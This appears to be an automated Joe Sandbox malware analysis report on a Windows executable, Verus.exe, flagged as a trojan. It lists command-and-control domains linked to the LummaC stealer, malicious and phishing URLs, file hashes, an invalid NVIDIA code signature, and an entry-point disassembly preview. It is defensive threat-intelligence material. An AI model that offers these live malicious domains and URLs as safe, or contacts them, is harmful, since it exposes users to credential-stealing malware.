172.67.152.13	enlargkiw.sbs	United States	13335	CLOUDFLARENETUS	true
172.67.141.136	condifendteu.sbs	United States	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
172.67.205.156	resinedyw.sbs	United States	13335	CLOUDFLARENETUS	true
172.67.140.193	vennurviot.sbs	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1533001
Start date and time:	2024-10-14 09:40:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Verus.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/5@11/9
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 7 Number of non-executed functions: 364
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:41:20	API Interceptor	5x Sleep call for process: Verus.exe modified
03:41:41	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.53.8	Executor.exe	Get hash	malicious	LummaC	Browse
	Solara.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	SoftWare.exe	Get hash	malicious	LummaC	Browse
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	SecuriteInfo.com.Win32.Evo-gen.11764.10915.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse
188.114.97.3	AeYgxx6XFk.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	kitaygorod.top/EternalProcessorMultiwordpressdleTempcentraltemporary.php
	http://host.cloudsonicwave.com	Get hash	malicious	Unknown	Browse	host.cloudsonicwave.com/favicon.ico
	alWUxZvrvU.exe	Get hash	malicious	FormBook	Browse	www.avantfize.shop/q8x9/
	foljNJ4bug.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/fxts/
	RRjzYVukzs.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
	octux.exe.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exe	Get hash	malicious	FormBook	Browse	www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	http://embittermentdc.com	Get hash	malicious	Unknown	Browse	embittermentdc.com/favicon.ico
	scan_374783.js	Get hash	malicious	AgentTesla	Browse	paste.ee/d/gvOd3

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
drawwyobstacw.sbs	Executor.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Solara.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	SoftWare.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	SoftWare.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	SoftWare(2).exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
vennurviot.sbs	Executor.exe	Get hash	malicious	LummaC	Browse	104.21.46.170
	Solara.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	SoftWare.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	SoftWare.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	SoftWare(2).exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse	104.21.46.170
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	104.21.46.170
condifendteu.sbs	Executor.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Solara.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	SoftWare.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	SoftWare.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	SoftWare(2).exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
steamcommunity.com	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Executor.exe	Get hash	malicious	LummaC	Browse	23.197.127.21
	Solara.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SoftWare.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SoftWare.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SoftWare(2).exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	https://r.clk20.com/s.ashx?ms=clk20comb:221053_100505&e=ACCOUNTING%40SBO.CO.AT&eId=72534635&c=h&url=https%3a%2f%2fwww.digikey.at%3futm_medium%3demail%26utm_source%3dcsn%26utm_campaign%3dclk20comb:221053-100505_CSN24CMM1%26utm_content%3dDigiKeyLogo_AT%26utm_cid%3d&c=E,1,HpCcAtsbpCegpKKqJ9Y5uFcA_ydFOa8bwbyPDmQPWZrYVAHSEO4EBUFk2oBVcoOSlhj1U-BBO3hqrTRAz1S8XP6noRCD2_d6D_dY_HcwfLi_OKAuOxCdCkg,&typo=1	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://www.kwconnect.com/redirect?url=https://www.lugiest.com/sqx/#Xem9lLmdyYWhhbUBjeWJnLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testoffer	Get hash	malicious	Unknown	Browse	172.66.0.227
	http://mxi.fr/json/upload/dkjxff.php?lfitf5p	Get hash	malicious	Unknown	Browse	172.67.170.19
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Executor.exe	Get hash	malicious	LummaC	Browse	104.21.46.170
	Solara.exe	Get hash	malicious	LummaC	Browse	104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
CLOUDFLARENETUS	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	https://r.clk20.com/s.ashx?ms=clk20comb:221053_100505&e=ACCOUNTING%40SBO.CO.AT&eId=72534635&c=h&url=https%3a%2f%2fwww.digikey.at%3futm_medium%3demail%26utm_source%3dcsn%26utm_campaign%3dclk20comb:221053-100505_CSN24CMM1%26utm_content%3dDigiKeyLogo_AT%26utm_cid%3d&c=E,1,HpCcAtsbpCegpKKqJ9Y5uFcA_ydFOa8bwbyPDmQPWZrYVAHSEO4EBUFk2oBVcoOSlhj1U-BBO3hqrTRAz1S8XP6noRCD2_d6D_dY_HcwfLi_OKAuOxCdCkg,&typo=1	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://www.kwconnect.com/redirect?url=https://www.lugiest.com/sqx/#Xem9lLmdyYWhhbUBjeWJnLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testoffer	Get hash	malicious	Unknown	Browse	172.66.0.227
	http://mxi.fr/json/upload/dkjxff.php?lfitf5p	Get hash	malicious	Unknown	Browse	172.67.170.19
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Executor.exe	Get hash	malicious	LummaC	Browse	104.21.46.170
	Solara.exe	Get hash	malicious	LummaC	Browse	104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
CLOUDFLARENETUS	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	https://r.clk20.com/s.ashx?ms=clk20comb:221053_100505&e=ACCOUNTING%40SBO.CO.AT&eId=72534635&c=h&url=https%3a%2f%2fwww.digikey.at%3futm_medium%3demail%26utm_source%3dcsn%26utm_campaign%3dclk20comb:221053-100505_CSN24CMM1%26utm_content%3dDigiKeyLogo_AT%26utm_cid%3d&c=E,1,HpCcAtsbpCegpKKqJ9Y5uFcA_ydFOa8bwbyPDmQPWZrYVAHSEO4EBUFk2oBVcoOSlhj1U-BBO3hqrTRAz1S8XP6noRCD2_d6D_dY_HcwfLi_OKAuOxCdCkg,&typo=1	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://www.kwconnect.com/redirect?url=https://www.lugiest.com/sqx/#Xem9lLmdyYWhhbUBjeWJnLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testoffer	Get hash	malicious	Unknown	Browse	172.66.0.227
	http://mxi.fr/json/upload/dkjxff.php?lfitf5p	Get hash	malicious	Unknown	Browse	172.67.170.19
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Executor.exe	Get hash	malicious	LummaC	Browse	104.21.46.170
	Solara.exe	Get hash	malicious	LummaC	Browse	104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
CLOUDFLARENETUS	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	https://r.clk20.com/s.ashx?ms=clk20comb:221053_100505&e=ACCOUNTING%40SBO.CO.AT&eId=72534635&c=h&url=https%3a%2f%2fwww.digikey.at%3futm_medium%3demail%26utm_source%3dcsn%26utm_campaign%3dclk20comb:221053-100505_CSN24CMM1%26utm_content%3dDigiKeyLogo_AT%26utm_cid%3d&c=E,1,HpCcAtsbpCegpKKqJ9Y5uFcA_ydFOa8bwbyPDmQPWZrYVAHSEO4EBUFk2oBVcoOSlhj1U-BBO3hqrTRAz1S8XP6noRCD2_d6D_dY_HcwfLi_OKAuOxCdCkg,&typo=1	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://www.kwconnect.com/redirect?url=https://www.lugiest.com/sqx/#Xem9lLmdyYWhhbUBjeWJnLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testoffer	Get hash	malicious	Unknown	Browse	172.66.0.227
	http://mxi.fr/json/upload/dkjxff.php?lfitf5p	Get hash	malicious	Unknown	Browse	172.67.170.19
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Executor.exe	Get hash	malicious	LummaC	Browse	104.21.46.170
	Solara.exe	Get hash	malicious	LummaC	Browse	104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 172.67.173.224 188.114.96.3 172.67.152.13 172.67.141.136 104.102.49.254 172.67.205.156 172.67.140.193
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 172.67.173.224 188.114.96.3 172.67.152.13 172.67.141.136 104.102.49.254 172.67.205.156 172.67.140.193
	Executor.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 172.67.173.224 188.114.96.3 172.67.152.13 172.67.141.136 104.102.49.254 172.67.205.156 172.67.140.193
	Solara.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 172.67.173.224 188.114.96.3 172.67.152.13 172.67.141.136 104.102.49.254 172.67.205.156 172.67.140.193
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 172.67.173.224 188.114.96.3 172.67.152.13 172.67.141.136 104.102.49.254 172.67.205.156 172.67.140.193
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 172.67.173.224 188.114.96.3 172.67.152.13 172.67.141.136 104.102.49.254 172.67.205.156 172.67.140.193
	SoftWare.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 172.67.173.224 188.114.96.3 172.67.152.13 172.67.141.136 104.102.49.254 172.67.205.156 172.67.140.193
	SoftWare.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 172.67.173.224 188.114.96.3 172.67.152.13 172.67.141.136 104.102.49.254 172.67.205.156 172.67.140.193
	SoftWare(2).exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 172.67.173.224 188.114.96.3 172.67.152.13 172.67.141.136 104.102.49.254 172.67.205.156 172.67.140.193
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 172.67.173.224 188.114.96.3 172.67.152.13 172.67.141.136 104.102.49.254 172.67.205.156 172.67.140.193

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Verus.exe_60c2564910af18faa22197385ca3547fdd3431b_6e980beb_4fc4714e-6a46-4c80-b28f-3fd7bfcdd490\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0748308489921798
Encrypted:	false
SSDEEP:	192:P22x680ao80BU/wjJqhD0OzuiFhZ24IO8z:vot3BU/wj9OzuiFhY4IO8z
MD5:	69DBC49A515230594017819FA9E0A5B0
SHA1:	1B89BFE82AB703DC920C0251620A8B0F54A28234
SHA-256:	D72BCA9FFB930CF4749F0EAD0363A5DB52367A31851B2554FD21073BDD8500C5
SHA-512:	4DDDAAA4F8FCB9F3C01F5AB78D028C533A3A6B6877B3ED32A61540F1072CCA3A390BDDE0A96EF53DAF7D1A98A50832CDB5D91FB8B13B5A2E8456C33BB1395DA9
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.6.5.2.8.9.5.1.8.9.7.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.6.5.2.9.0.0.5.0.2.2.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.c.4.7.1.4.e.-.6.a.4.6.-.4.c.8.0.-.b.2.8.f.-.3.f.d.7.b.f.c.d.d.4.9.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.1.9.9.4.d.b.-.9.8.b.5.-.4.f.a.c.-.9.3.c.e.-.1.4.3.6.0.1.a.3.d.f.d.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.e.r.u.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.F.e.y.W.r.i.t.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.f.8.-.0.0.0.1.-.0.0.1.4.-.2.b.d.c.-.1.f.6.b.0.c.1.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.9.e.a.b.8.1.d.e.9.0.f.3.7.1.0.a.f.c.a.8.1.7.2.6.9.4.8.9.1.d.b.0.0.0.0.0.9.0.4.!.0.0.0.0.6.9.a.8.8.6.0.b.3.e.9.5.d.e.3.0.f.7.a.b.b.4.8.5.d.1.1.9.0.8.c.4.d.e.c.e.f.f.6.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER10AC.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Oct 14 07:41:29 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	131090
Entropy (8bit):	2.0336667433889906
Encrypted:	false
SSDEEP:	384:COjCSh9RaBWNq1fZIu8NW7gkJQtcWbG05HWFaV8XnfkMWHA5Hdgpow:fdrRaBWNqdcg7fAXgHX1Opr
MD5:	3F8AEB1721C805ACDBD5E664C74EFDE6
SHA1:	4DBBEEA35B4E13697EBF263117B9FF4607DD5309
SHA-256:	73BE4D342AE8542617AFB3ABF7DDF7FF7B57F6274BC3167EDB064EC31D0101D0
SHA-512:	E80EB13C6D64B4F9FE6E510F41007B99C7176D404E6F06D1947A7B77ECB60165F63E0A2D8045C314061B2BA06C77A96DCC4AB04D05200E36470A958791FF1285
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......)..g............t.......................l...d%......D....W..........`.......8...........T............F...............%...........'..............................................................................eJ......T(......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER11A7.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	3.7007530219952662
Encrypted:	false
SSDEEP:	192:R6l7wVeJaO6jL6Y9nSUCUgmfUIprG89bjjsfRBm:R6lXJL6P6YNSUCUgmfUqjIfm
MD5:	F156F46BC31D18E3F45C1A6A0752CD93
SHA1:	DAF62E22F7370E24AC8B8508A80B57314890E18F
SHA-256:	073540097061359FCDBF6D4145DC60D007ECF53F9486C33F65486FA1E092FB1E
SHA-512:	ECC6C058F0E18332ACCE741DFDF6AB9A7B98E116125A76B9BEB5BD0A7264E1E2ECBCB0F7A768EBE0CF3EA7C6332991E86BB942F446B709D5B10DE7B72A79E8B5
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER11E6.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4664
Entropy (8bit):	4.481809090343319
Encrypted:	false
SSDEEP:	48:cvIwWl8zsBJg77aI9C/vWpW8VY1Ym8M4JUqFp+q8GDEWvUfhfDwMRd:uIjfTI7K+7VJJ/mWvUfhfLRd
MD5:	938AC545DFDD6D8DEDFC33E0FCB0E97D
SHA1:	C423CA4EDEF2C8F5F0F87D2C925E7EF3C5EF0D72
SHA-256:	6382486E0FBC2AA1527B332A6C7999411C009325BA59BB6B130FA1DA45E9C6F4
SHA-512:	6A8C17BCFBF140278CA66EE28CD82ADA054092A24AA0255286A37CD57A55CF5A025A46AA5E6C3E2DF14E64A444D25CAD903BC315961556339DF9CD1D11AC5264
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542804" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465539495637126
Encrypted:	false
SSDEEP:	6144:ZIXfpi67eLPU9skLmb0b4FWSPKaJG8nAgejZMMhA2gX4WABl0uNTdwBCswSbd:qXD94FWlLZMM6YFHh+d
MD5:	83EE31EFB2F1C1AD79FC0C66D654987E
SHA1:	16A1E624527780227D9A75D37AB546756FFA4D2C
SHA-256:	4A81878DE6FCC3163AEF2A886A16B9E4153F5FAF77C46545F507F7D2194D8B97
SHA-512:	E783BD3B8EEC80495BA4F2A83E92CFBEE7E7C3AC46035E23CD26BCABD9922FFE23B6DD6A156880274B5CF0DD812840DF66AD71A3362EFAD8F124A0689255E981
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..D{................................................................................................................................................................................................................................................................................................................................................(QSO........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.894087108591329
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Verus.exe
File size:	2'394'152 bytes
MD5:	9639830d1a300d2e4c409c5809374039
SHA1:	69a8860b3e95de30f7abb485d11908c4deceff68
SHA256:	6d7a6e7c674e93b337ed751614e214ab6430a4c4ae5a9811c3ed3fdac5e0ae59
SHA512:	8d5a1aa9e840fdb105131f5b28883f565ec2361c2a3cad3439f4221daf886ad1770baabb4027383c5e48e532e8e6222eef789b08dc2dd2a3f4dfce63c0545efa
SSDEEP:	24576:c9oYv0s5EOybPGe+LAm0q9eKYSec3skTdG6kFjN/FGitIFcGbQD4vWpy0JeWJ06G:Kvvv9e0eyskTdh2N/FGiuFcZi0g0DU5T
TLSH:	2EB55C6D6E4A80A4C06D1037CDB152BC6DF46C35EFB5A8E3E2547A31AA3DBD15832783
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}.....Y...Y...Y.N:Y...Y.N+Y...Y...Y...Y.N,Y<..Y.d%Y...Y...Y...Y...Y...Y...Y...Y.d+Y...Y.N;Y...Y.d>Y...YRich...Y........PE..L..

File Icon


Icon Hash:	cc9a92cceab2ee4c

Static PE Info

General

Entrypoint:	0x493520
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x51D2C152 [Tue Jul 2 12:02:26 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	38a27b0dd57a5c25ab8b3b91a143c948

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 00:00:00 16/01/2026 23:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
call 00007FC50917FBC2h
jmp 00007FC50917251Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov cx, word ptr [eax]
inc eax
inc eax
test cx, cx
jne 00007FC509172698h
sub eax, dword ptr [ebp+08h]
sar eax, 1
dec eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp dword ptr [ebp+14h], ebx
jne 00007FC5091726C2h
call 00007FC5091761FEh
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 00000016h
call 00007FC5091702A5h
add esp, 14h
or eax, FFFFFFFFh
jmp 00007FC50917276Ah
push esi
mov esi, dword ptr [ebp+0Ch]
push edi
mov edi, dword ptr [ebp+10h]
cmp edi, ebx
je 00007FC5091726C6h
cmp esi, ebx
jne 00007FC5091726C2h
call 00007FC5091761CEh
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 00000016h
call 00007FC509170275h
